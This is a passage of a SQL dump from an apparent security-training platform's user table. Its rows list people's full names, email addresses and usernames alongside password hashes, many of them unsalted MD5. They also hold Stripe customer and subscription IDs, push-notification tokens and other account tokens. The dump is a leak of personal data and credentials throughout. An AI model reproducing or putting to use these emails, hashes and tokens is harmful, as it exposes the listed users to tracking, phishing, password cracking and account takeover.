(96, NULL, 'John', 'johnjcutter@gmail.com', '$2a$10$jArp7an5bVdW90wwZgrNo./TL48FvUJj7cYwIlNlldMU4kUF8sSri', 'normal', NULL, 'free', 'active', 'sub_1SsHYfL5VKtXn66bIRWQMAE9', 'cus_TpxTvHr1TUNHre', 0, NULL, NULL, NULL, NULL, 2, '2026-01-22 07:10:46', 'cuttingedge9', 'Cutter', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-22 04:10:46', NULL, 1, 0, NULL, '6677eee4907bebee0a10055b296051823237ccd893228a38d64da5f627b915a5', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(97, NULL, 'Daniel', 'daweda@my.wgu.edu', '$2a$10$w3ajn.8yvbGL8SJJH7XQfOB7WOyvXIQP8IRP3MpPgEzo1bfZQTUaS', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-25 08:03:58', 'Dann5434', 'Aweda', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 05:03:58', NULL, 1, 0, NULL, 'ab8f3e6377f44010e917215b6a25e80e245e56064d777e2ca4f1c5484ec018f7', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(98, NULL, 'Aman', 'ask001aman@gmail.com', '$2a$10$/Y30JSEv.QirbZ.TVBgitek.R705DAgCWBl0PP9xkRPhh63xx/kGq', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-01-25 11:17:42', 'Ask001aman', 'Singh', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 08:17:42', NULL, 1, 0, NULL, '73d16cb7daeaea52003c248686fd653490afdc6763c741ff5c106a096ff66a44', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(99, NULL, 'Alina', 'alinaraza104@gmail.com', '$2a$10$ecNRnyHOKcsgAfM9OsE4tu0.H2ua3WhVSvV1VG7SP9ykMnyF6uUb2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-15 08:10:28', 'Alina', 'Raza ', 1, NULL, NULL, NULL, 1, NULL, NULL, '2026-01-25 15:12:11', NULL, 1, 0, NULL, '53188ac67dbb67a5f4e39f949187cd4c107d47933413d0f7eb1be5dcf50e9f99', NULL, 'CLOUD', NULL, 'ExponentPushToken[Qpo8uFPhGg88rhUlgzbf0D]', NULL, 0, NULL, 'web', 0, 1, 0),
(100, NULL, 'Bertram', 'bertram_e@ymail.com', '$2a$10$B.dcj2H0SIAhBCWc1zOvLexX1j/uF1damgTnufYF0iRjfNwwyZ8vK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-25 22:36:46', 'bertram_eymailcom', 'Ekwunife', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 19:36:46', NULL, 1, 0, NULL, '8d689fe907b1f0cccda0753bf3828e7bcda2d56c6ef7b04bf132f531c49a2edf', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(101, NULL, 'Connor', 'rcbyron3@gmail.com', '$2a$10$tA.hs91oS4ilTZh08LcG8.BUOAHBUBh.zrZWxsyBq1YLFediCreVe', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 00:03:19', 'conzor', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 21:03:19', NULL, 1, 0, NULL, '65fd0a44d00ef90b3a3847113b9082fe617b76cfcc9f6f2475ceb441af980ab1', '1d10c4d0cee8cb1baaf5bf7978071b4d4a90147b3543bdee0aa97659e6ce346b', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(102, NULL, 'Halil', 'hbariscyber@gmail.com', '4ca815513b36f1ecc7eb335cceb0d9d3', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 00:54:58', 'hbariscyber6cd01c', 'BARIS', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-25 21:54:58', NULL, 1, 0, NULL, '3378f8a50f17cbb85616565068c1b4cd42ffaf9a6a9f83677ce5ddaded0ce392', 'a3bc9d79c4c58f10877d7ba19d05715210b3a56a74b5271f52a9c904c45d3522', NULL, NULL, 'ExponentPushToken[mpBXfZHQhy10xWYYrTA2Xq]', NULL, 0, NULL, 'web', 0, 1, 0),
(103, NULL, 'Rodney', 'rp.interactive@gmail.com', '$2a$10$haR0KAgbIYS9grwVNUe7/.cqTRwtKP6KaUbBYTFpx4OP6KRRnabfy', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 04:31:17', 'rodneysprod', 'Painagan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-26 01:31:17', NULL, 1, 0, NULL, 'aa27639814b8a7d7994c8a720fbd1b10f59c257817867c874a5d8fc9fde6c534', '22d566647086330a2e4c68ca26d3df124e0fce6f886d92312ccc0e7a9d1f3f94', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(105, NULL, 'Ron', 'Hadi.s.khalaf@gmail.com', '$2a$10$UoeX3kkl5ORexFtJ4H0R5.BBVsSpt5Hwnya12LxPVMaY74KOYjJQ6', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 06:43:19', ' Ron', 'Seo', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-26 03:43:19', NULL, 1, 0, NULL, '50806a12f18bf4795733cef76907bdb85afdb4482aa3a252bc33fb8f23209bec', 'a9f675babe524660c08a4c32c4d2db3f6a13c1fb576e293ab545a3aad8fead8a', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(106, NULL, 'David', 'storm09b3@quickmail.byetabs.com', '$2a$10$gNWfgM0HE5Tmh92kyifUUuJCuXt7fiI5Kz/qKeJOFIgLKZmeNgHia', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-26 07:14:59', 'David', 'S', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-26 04:14:59', NULL, 1, 0, NULL, 'ff122befc45b3c2b25b50cc916d711ba519e2764f408c02626e0db911e8fac6c', '69f8cb799f82b732a1bba5c9fe13790947cd071d11695233f14c2e583e144de9', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(107, NULL, 'Fadime', 'fadime.taskinsoy@georgebrown.ca', '$2a$10$IFnQgf7T.QN1EYtRR79Fv.Dg6U1cMpyi8uunckGr81W2Xc8Qdahf2', 'pro', NULL, 'monthly', 'active', 'sub_1SvK77L5VKtXn66bCJFUV9jb', 'cus_Tt6JLy763tjkqR', 0, NULL, NULL, NULL, NULL, 2, '2026-01-27 22:39:37', 'Cyberca', 'Taskinsoy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-27 19:39:37', '2026-03-02 18:58:32', 1, 0, NULL, 'a917307a923059e2fdd44dff8fcac0e5bfafe1fd82b9aa266c405765dcaaf1de', NULL, 'SIEM', NULL, NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(108, NULL, 'Abdul Wakil', 'zamani.abdwakil@gmail.com', '1e9e410504cd5aa00bcb14e96f66b5cc', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-27 22:55:48', 'zamani.abdwakilb2de17', 'Zamani', 1, NULL, NULL, NULL, 1, NULL, NULL, '2026-01-27 19:55:48', NULL, 1, 0, NULL, 'ae8339e20e3c731b0f8935c4c1d04f3a4d88d56da0a94bcc16b19d87588403f1', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(109, NULL, 'Kabiru ', 'adkasu26@gmail.com', '$2a$10$xQTWllcAApZCZthwX/0ZY.Ilf0gTakhnwpMX24ZLOFwR42hi1AvgW', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-26 17:03:46', 'Kayfactorial', 'Adio ', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-27 21:06:52', NULL, 1, 0, NULL, 'fe5ec6c4630d882755df3b82093d95ef1e5c3f9f30a885a68c587e2d7391564b', '0ace485598be9f1d37c10648389209f25f890884aba8e5b4f37455ec940a51f6', 'NDR', 'MAL', 'ExponentPushToken[ZGIa83EpyEFKmKL0eBLNrL]', NULL, 0, NULL, 'web', 0, 1, 0),
(110, NULL, 'Michael', 'michealscrook@gmail.com', 'cbb3836a42fe43928c5f82f9bf8875f2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 16:36:09', 'michealscrooka63ea9', 'Crooks', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 13:36:09', NULL, 1, 0, NULL, 'f2e70050803fe6d9b3ea0e0319217831350808ca613f1928cff1d4cbd76f448e', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(111, NULL, 'Kleo', 'kleokarpathy@gmail.com', '856d998a9d15e3edead2905797b12f18', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:52:08', 'kleokarpathydf9dc3', 'Karpathy', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:52:08', NULL, 1, 0, NULL, 'bf10001f51f26d6d76481ea591ea5dd17cb4e34b7f0ae44aafcffb84fbbcc52f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(112, NULL, 'Susan', 'susanharts99@gmail.com', '76c6a936e69641418f79281a37bf6b86', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:53:28', 'susanharts998fdfce', 'Harts', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:53:28', NULL, 1, 0, NULL, 'a531c2ebf5348d193b26ee64b462633d5237d9f31c7ff9158c185aff628d0246', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(113, NULL, 'Logan', 'logantaylor1656@gmail.com', '5d84c69e2ea772b1eb371855a7026710', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:55:24', 'logantaylor16567f6997', 'Taylor', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:55:24', NULL, 1, 0, NULL, '25392f11f61041dac1b518df13579db7728975dbd7bd1ca381e90b6d140f680a', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(114, NULL, 'Benjamin', 'halesbenjamin61@gmail.com', 'c16f10935fcac9e886d78a9ec873dd5e', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-30 17:57:22', 'halesbenjamin61f22b2a', 'Hales', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-30 14:57:22', NULL, 1, 0, NULL, '12553e2d73deef5705958afcbc365b0f4fa481d48b37ee6440b6c7171266de6f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(115, NULL, 'A.', 'ldrarivunithi@gmail.com', '3280b0a37626d080b336813aa2d6f2f8', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-01-31 15:37:56', 'ldrarivunithi0a7c25', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-01-31 12:37:56', NULL, 1, 0, NULL, '47ca6b0c2cbb5ba4d26da923e250a086d54829a029eb8a69a44214676ec8de5f', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(116, NULL, 'shane', 'shanerees2k5@hotmail.com', '$2a$10$lcc3zJWwm9a1KCnWhmOuH.NGZmd1sJGrwBgYolAza6RofE.v0k7.K', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-01 12:06:03', 'SMR', 'rees', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 09:06:03', NULL, 1, 0, NULL, '8651701015ba038a40901180e02481a70b64a9c70af9057ad6b582dd4212240b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(117, NULL, 'Lucas', 'jasperlucas024@gmail.com', '3544af3c112dfbf9723481b91c854fa5', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:19:53', 'jasperlucas0241f0daa', 'Jasper', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:19:53', NULL, 1, 0, NULL, 'aaaf4875c9f801b833d431160a5662179995fc7b6fb586b4d9c159c597bd1875', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(118, NULL, 'Nancy', 'nancystark100@gmail.com', 'dda32e43120191e5dc7a63c2fcf48ee7', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:22:02', 'nancystark1001e2130', 'Stark', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:22:02', NULL, 1, 0, NULL, '274d088b14ccc21e243b6345709462de8efd81457938204d86a0392cd4021e9a', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(119, NULL, 'Steve', 'stevenharrys44@gmail.com', '0af1c841986e3c324b86e16bbc9a4d6a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:28:47', 'stevenharrys44256e91', 'Harrington', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:28:47', NULL, 1, 0, NULL, '80146a52b0f2de905d873820985a97bb023db578375ffe555f63829b0246376e', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(120, NULL, 'Mont', 'montgregamore@gmail.com', '10466ee48dcc6f0c3bf0bd14271018c8', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 19:29:24', 'montgregamore9e2d45', 'Gregamore', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 16:29:24', NULL, 1, 0, NULL, 'e3dc63b80c328e382319b7d050113d9ba1b9c6208ba3ee9249616b5c52678add', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(122, NULL, 'Bertram', 'bertram.c.ekwunife@gmail.com', 'e4faa8419aa920b32494f27827219a26', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-01 22:53:59', 'bertram.c.ekwunife12136a', 'Ekwunife', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-01 19:53:59', NULL, 1, 0, NULL, '9094fc5e6f8c768c7739eb3f5bfa3db8d08cdb3c3592284bc4aba12742bc13d9', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(123, NULL, 'Ilxom', 'togjab@imail.edu.vn', '$2a$10$cRM8geA8qBydvcRk6KJRGOQOdl8lCnQCoiGFSVtVDjTWXgJqdgtx.', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-02 13:05:56', 'blkmg', 'Sharapov', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-02 10:05:56', NULL, 1, 0, NULL, '9a263d9ebc6236b15b7f826122f41188f4fe7bd170c73114693ca00448afe777', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(124, NULL, 'Ilxom', 'ilxomsteam@gmail.com', 'f52613b42ef50d3a4226be93e530e8cf', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-02 13:09:50', 'ilxomsteamed7021', 'Sharapov', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-02 10:09:50', NULL, 1, 0, NULL, '3dddbc3e226b70d4e255486ebc98de22cb66b12aa3b41eea30864b680da5168e', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(125, NULL, 'Ludwig', 'ludwigborgen@gmail.com', '04d2c125ba5fd5e0d19118305824b42d', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-04 04:33:45', 'ludwigborgen6f6f96', 'Borgen', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-04 01:33:45', NULL, 1, 0, NULL, 'dbec187c279da7f3c16a58d6df0f225d5d4ae4fc81f856defd337d8b8e7b5c29', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(126, NULL, 'Hasan', 'hasancomcee@gmail.com', '$2a$10$Q3YS6gJ4eNPHZmyrphdUVO8SoeaCj9HFv/10AkWPUNiHhNuuNoKES', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-05 01:06:04', 'hasancomce', 'Comce', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-04 22:06:04', NULL, 1, 0, NULL, '78fde2d3c7abd1143264d20d437341d4356d76fbbd38950482e16d479c17f18c', NULL, 'CLOUD', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(127, NULL, 'Mario', 'mariouriel10@gmail.com', '23f2905f2ed044006abdf8468bb51fc2', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-05 20:48:43', 'mariouriel104eb6b1', 'Uriel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-05 17:48:43', NULL, 1, 0, NULL, '4f2f6196317096dc9e25b797947a646a71183af860a303d5b5e459f03cee3019', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(128, NULL, 'Hesham', 'heshammamdouh199717@gmail.com', 'bfa40df0bd0841c74e3017e84baf6315', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-07 04:17:18', 'heshammamdouh199717af6c33', 'Mamdouh', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-07 01:17:18', NULL, 1, 0, NULL, '2136ebff1a7ecbb04153abaca4884293c11d22fadc3739fd4f78499fb5162a4d', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(129, NULL, 'You', '443103855@student.ksu.edu.sa', '$2a$10$UUXl3lpzk4QQpVh2vhs1q.EVzAEAGBcuQz9m.UR8a96L28Dp5MoDu', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-08 00:48:41', 'Yousef7', 'A', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-07 21:48:41', NULL, 1, 0, NULL, '2f2fb36fcb4fd47a7c5c5c6c4bc360144f689d945346e8b47e883620d7132375', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(131, NULL, 'ca', 'yqxea2qjvd@cross.edu.pl', '$2a$10$3VAoob/YLnD/VCKFZD1pZeygVFEToIFvqC4/FPFnxczIlZsY9qkym', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-08 11:15:26', 'yqxea2qjvd', 'dac', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-08 08:15:26', NULL, 1, 0, NULL, '1b1a8fafea61e77686e67eb0712d693d2615bb28898b504eaa24f9546667437b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(133, NULL, 'Ryan', 'ryanhuck124@gmail.com', 'cf8e88c1f50ca3cfcee46d23414eb14e', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-08 19:07:41', 'ryanhuck1242d35d5', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-08 16:07:41', NULL, 1, 0, NULL, '6570f07392522b8657d43f9a49d6f3589a6acc9567c84712ccaac7fc246139e3', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(135, NULL, 'QWERTy', 'learnhacks360@gmail.com', '$2a$10$PwRT2Fr3HA8DAjXUvWvyx.d7z6.qGDSHR48znaM68YluB3mX9wH8i', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-08 20:41:33', 'learnhacks360', 'SDF', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-08 17:41:33', NULL, 1, 0, NULL, 'b254e5653db566cd9ebabdd8b6af8063dc1b069fdc37017e748327af2672d2c6', NULL, 'SIEM', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(136, NULL, 'Adam', 'lionadamus@gmail.com', 'c3da9ac18f37d776b80849079461f88c', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-10 01:07:24', 'lionadamus5e5d4f', 'Lion', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-09 22:07:24', NULL, 1, 0, NULL, 'ce1d14828342269e4d37b48c1266cc12a35cc9a83e4956493474b8319c08c991', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(137, NULL, 'Ravi', 'ravipatel43194@gmail.com', 'f6695e9d1c7097e7bf338a97ebbd48e5', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-10 15:44:43', 'ravipatel43194c956de', 'Patel', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-10 12:44:43', NULL, 1, 0, NULL, '6647a2b971576182f389ac80cd21c412db188085840c7a9ce3eb9e33f3980a0b', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(138, NULL, 'abaalsafa', 'ffxxqq1@gmail.com', '$2a$10$zHMpoFxvBokoY5UcROCxI.09JFFRplIiwNT/Yin4h/ltx/2aH.huO', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-11 19:58:57', 'w6n', 'faisal', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-11 16:58:57', NULL, 1, 0, NULL, '42d88aacfe5a4cb2178e059492fae0166a3da950e179dbd863e182b6e39bde91', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(140, NULL, 'Rhylan', 'rhylan.hildner@snhu.edu', '$2a$10$hvMe2/b2W0F0UDbxUntp9.geU.nLj3GUSbWFKm/gqaLQ23fkF6Msm', 'pro', NULL, 'monthly', 'active', 'sub_1SzgsqL5VKtXn66ba6zd5x5X', 'cus_Txc72zGGxj1dKN', 0, NULL, NULL, NULL, NULL, 0, '2026-02-11 20:03:12', 'rhylan', 'Hildner', 1, NULL, NULL, NULL, 3, '2026-03-03 03:54:10', NULL, '2026-02-11 17:03:12', '2026-03-11 20:07:25', 1, 0, NULL, '982896c988cdd5fb9443f2ccb942a5dafa39afb777149ffa443103a13da1bc75', NULL, 'SIEM', 'MAL', NULL, NULL, 1, NULL, 'web', 0, 1, 0),
(141, NULL, 'Charles', 'chuck.albayrak@gmail.com', '$2a$10$OWesTUR4NWeEDQCvgptI..DD2MxRSP/yiKmZRlBbEhXBLdM40ZzbC', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-02-12 06:14:49', 'cyberjayhawk', 'Albayrak', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-12 03:14:49', NULL, 1, 0, NULL, 'bb1ef31db751eaa114082f108e0c700a4c45a0acb538e950afec2a9df6f03805', NULL, 'TI', NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(142, NULL, 'Julia', 'blakveilbrds@gmail.com', '1183a987db5f09393431feadf94dfbeb', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 3, '2026-03-07 08:08:44', 'blakveilbrds127c1b', 'Munoz', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 06:26:32', NULL, 1, 0, NULL, '285174fc865a757fe4110fe2b5a42883f06be306f23640f3a47999c4bc79c89a', 'f569fac85600e946030cfede3e9b921f6dbef4069a5e079eb876a70e07f29bb4', 'SIEM', 'EDR', NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(143, NULL, 'Mohamed', 'mohamedrimzanabdulraheem@gmail.com', '$2a$10$F.qiGNf9vZSFmn8v4326sO81Xhb3wFobN2q4nKmFpTNUfbw4ZTR0G', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 11:38:18', 'Cybersentinel', 'Rimsan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 08:38:18', NULL, 1, 0, NULL, '711900913ce459b29e57fd4bdede1f4ac8bb61a5ae110a723727f3a215bfd7bb', 'fab355d9e8768188672059eaaed25a6985b8ead5be1f253a5e179e8a39f30ab3', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(144, NULL, 'Ryan', 'ryansalomon59@gmail.com', '$2a$10$lkEhFhe2u1TvPRGBZCtU.uwtCUHutj/f036cntJJCn2/oR6tHwzRK', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 12:27:26', 'Salo22', 'Salomon', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 09:27:26', NULL, 1, 0, NULL, '1215a664916df039ee1d53f7a73c55a313e8716c879c25e9fdee84eff71f66ef', 'fc5ec141dee422e75c62c49ee6de44a2c7ef5e428f29322a8d0010f89d6f20c3', NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(145, NULL, 'Nagaraju', 'cybersec352@gmail.com', '0d4bcf56a45b62b06be6a4eda1ab4956', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 1, '2026-02-14 12:36:58', 'cybersec352286764', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 09:36:58', NULL, 1, 0, NULL, '00e6137b4bdbe7b8aa5ee9d603a718536e428bee3c05d928c308b0ba33bc0764', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(146, NULL, 'My', 'mysofinet@gmail.com', 'd145f43a1f652a5954fbe489f6b27b1f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 18:55:19', 'mysofinetb8f7c7', 'Sofinet', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 15:55:19', NULL, 1, 0, NULL, '6e46386f1824ae5b5353942c372d01bf2a9ea2f308cde6371bcf5e5a6252e3df', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(147, NULL, 'Mehmet', '75aksu75@gmail.com', '014358019d2d6ede824a4f3e1905b71f', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 19:15:23', '75aksu75cdcd99', '', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 16:15:23', NULL, 1, 0, NULL, 'dcad7b8ad2922c473d663641e4fa1448c79bc9722ce6b089495cf5ed75ab4d21', NULL, NULL, NULL, 'ExponentPushToken[i2ORC3KX1d0TwNzcvb4BxS]', NULL, 0, NULL, 'web', 0, 1, 0),
(148, NULL, 'Nesibe', 'nesibenur@gmail.com', '4c2514621a7d1ec851b346299db0d956', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 20:00:19', 'nesibenur2cd26e', 'Yilmaz', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 17:00:19', NULL, 1, 0, NULL, 'fcae5eef07cd73dc381ec2935a8874b965625852e721fc8b383e3aca3980c1df', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(149, NULL, 'Ozlem', 'ozlemkor2000@gmail.com', '45c6a266dd7f052b4bf930413aaedf76', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 20:53:22', 'ozlemkor2000c75866', 'Ozkan Kor', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 17:53:22', NULL, 1, 0, NULL, '8491e81dcd2f71f0cfbcb35add2c3f22179e87539980bfcf55e9695fa6d753ea', NULL, NULL, NULL, NULL, NULL, 0, NULL, 'web', 0, 1, 0),
(150, NULL, 'Fuat', 'fuatozarslan034@gmail.com', '73524b5503f382c84d2e941f0bf5327a', 'normal', NULL, 'free', 'active', NULL, NULL, 0, NULL, NULL, NULL, NULL, 0, '2026-02-14 21:33:41', 'fuatozarslan0349941b5', 'Ozarslan', 1, NULL, NULL, NULL, 0, NULL, NULL, '2026-02-14 18:33:41', NULL, 1, 0, NULL, 'a8b8a8d953d88951e29f5767bb6a73992b97649e1a9ab3af82eabfe1ac73b0ca', NULL, NULL, NULL, 'ExponentPushToken[ULmq6NPrWFeyCmpZFJu-Ie]', NULL, 0, NULL, 'web', 0, 1, 0),
